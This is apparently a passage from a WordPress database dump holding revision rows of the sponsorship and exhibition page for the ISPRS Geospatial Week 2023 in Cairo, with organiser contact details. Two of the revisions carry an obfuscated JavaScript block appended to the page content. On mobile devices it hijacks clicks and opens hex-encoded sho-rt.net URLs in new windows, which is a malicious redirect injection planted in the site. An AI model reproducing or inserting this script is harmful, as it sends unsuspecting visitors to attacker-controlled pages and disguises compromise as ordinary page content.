border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2928\" img_size=\"1600x2000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 13:04:05','2022-10-26 13:04:05','',2920,'https://gsw2023.com/?p=2929',0,'revision','',0),
(2930,1,'2022-10-26 13:16:36','2022-10-26 13:16:36','','ext11','','inherit','open','closed','','ext11','','','2022-10-26 13:16:36','2022-10-26 13:16:36','',2920,'https://gsw2023.com/wp-content/uploads/2022/10/ext11.jpg',0,'attachment','image/jpeg',0),
(2931,1,'2022-10-26 13:16:50','2022-10-26 13:16:50','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 13:16:50','2022-10-26 13:16:50','',2920,'https://gsw2023.com/?p=2931',0,'revision','',0),
(2932,1,'2022-10-26 13:31:38','2022-10-26 13:31:38','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of 